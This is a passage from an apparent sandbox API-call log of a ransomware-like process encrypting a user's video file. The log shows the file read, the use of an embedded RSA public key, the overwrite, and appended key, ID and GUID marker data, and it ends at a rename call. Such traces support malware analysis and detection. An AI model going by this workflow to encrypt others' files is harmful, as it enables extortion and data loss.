ftCreationTime.dwLowDateTime=0xd330e430, ftCreationTime.dwHighDateTime=0x1d5b749, ftLastAccessTime.dwLowDateTime=0xc2193d30, ftLastAccessTime.dwHighDateTime=0x1d5c358, ftLastWriteTime.dwLowDateTime=0xc2193d30, ftLastWriteTime.dwHighDateTime=0x1d5c358, nFileSizeHigh=0x0, nFileSizeLow=0x9d45, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xVzUBH__T XnwETm.mp4", cAlternateFileName="XVZUBH~1.MP4")) returned 1 [0239.691] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\oMoJTci\\xVzUBH__T XnwETm.mp4") returned=".mp4" [0239.691] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\oMoJTci\\xVzUBH__T XnwETm.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\kyk5k01vvlqpw\\omojtci\\xvzubh__t xnwetm.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.692] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=40261) returned 1 [0239.692] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.694] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x9d1f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.695] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.697] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0239.697] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x9d45, lpOverlapped=0x0) returned 1 [0239.701] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.701] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.701] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.701] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0239.702] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.702] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.702] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.702] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.702] GetLastError () returned 0x0 [0239.702] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.702] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0239.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.703] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.703] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.703] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9d50) returned 0x3b95d50 [0239.703] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0239.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0239.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0239.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0239.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86c18 [0239.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e38 [0239.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86c60 [0239.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e50 [0239.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e80 [0239.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88ee0 [0239.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e98 [0239.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0239.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0239.704] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e80 | out: hHeap=0x620000) returned 1 [0239.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e98 | out: hHeap=0x620000) returned 1 [0239.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ee0 | out: hHeap=0x620000) returned 1 [0239.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0239.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88ee0 [0239.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0239.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88e98 [0239.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b88e80 [0239.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0239.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0239.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0239.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0239.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0239.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0239.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0239.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e98 | out: hHeap=0x620000) returned 1 [0239.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e80 | out: hHeap=0x620000) returned 1 [0239.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ee0 | out: hHeap=0x620000) returned 1 [0239.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0239.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.705] GetCurrentThreadId () returned 0x5b4 [0239.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0239.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b88a28 [0239.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0239.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0239.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0239.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0239.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.706] GetCurrentThreadId () returned 0x5b4 [0239.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0239.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0239.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0239.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0239.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0239.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88ee0 [0239.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0239.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0239.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0239.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0239.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e80 [0239.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0239.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0239.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0239.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0239.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88e98 [0239.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0239.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0239.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e68 [0239.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0239.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88ef8 [0239.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0239.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0239.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88ec8 [0239.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88eb0 [0239.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88f10 [0239.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88eb0 | out: hHeap=0x620000) returned 1 [0239.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88eb0 [0239.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ec8 | out: hHeap=0x620000) returned 1 [0239.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0239.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0239.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0239.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e80 | out: hHeap=0x620000) returned 1 [0239.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88e80 [0239.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0239.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ee0 | out: hHeap=0x620000) returned 1 [0239.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0239.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f10 | out: hHeap=0x620000) returned 1 [0239.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0239.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bb78 [0239.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0239.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0239.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e80 | out: hHeap=0x620000) returned 1 [0239.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0239.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0239.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0239.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0239.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0239.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0239.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0239.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0239.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88eb0 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ef8 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e98 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e68 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e50 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b86c60 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.710] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x9d40, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x9d40, lpOverlapped=0x0) returned 1 [0239.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0239.711] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x9d45, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.711] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0239.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0239.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0239.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0239.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0239.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0239.712] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0239.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.712] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.712] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.712] CloseHandle (hObject=0x644) returned 1 [0239.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8da60 [0239.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b89cd0 [0239.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8da60 | out: hHeap=0x620000) returned 1 [0239.714] MoveFileW 